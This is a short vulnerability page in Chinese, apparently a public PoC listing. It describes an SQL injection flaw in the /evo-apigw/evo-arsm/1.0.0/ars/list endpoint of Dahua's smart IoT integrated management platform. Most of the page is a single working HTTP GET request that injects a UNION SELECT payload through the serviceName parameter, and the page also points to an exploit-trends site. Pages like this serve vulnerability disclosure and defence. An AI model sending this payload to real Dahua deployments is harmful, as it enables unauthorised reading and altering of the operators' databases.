Dahua-智能物联综合管理平台 /evo-apigw/evo-arsm/1.0.0/ars/list SQL 注入漏洞

2026-01-16 Dahua PoC Public

Description

大华智能物联综合管理平台是一款集成多项业务管理功能的智能物联基础软件,广泛应用于智能园区和商业综合体等场景。该系统的 /ars/list 接口存在SQL注入漏洞,攻击者可以通过构造恶意请求执行任意SQL语句,可能导致敏感信息泄露或数据库被篡改。

PoC

GET /evo-apigw/evo-arsm/1.0.0/ars/list?serviceName=%27+UNION+ALL+SELECT+NULL,NULL,NULL,CONCAT(0x7e,(select%20md5(46911583)),0x7e),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities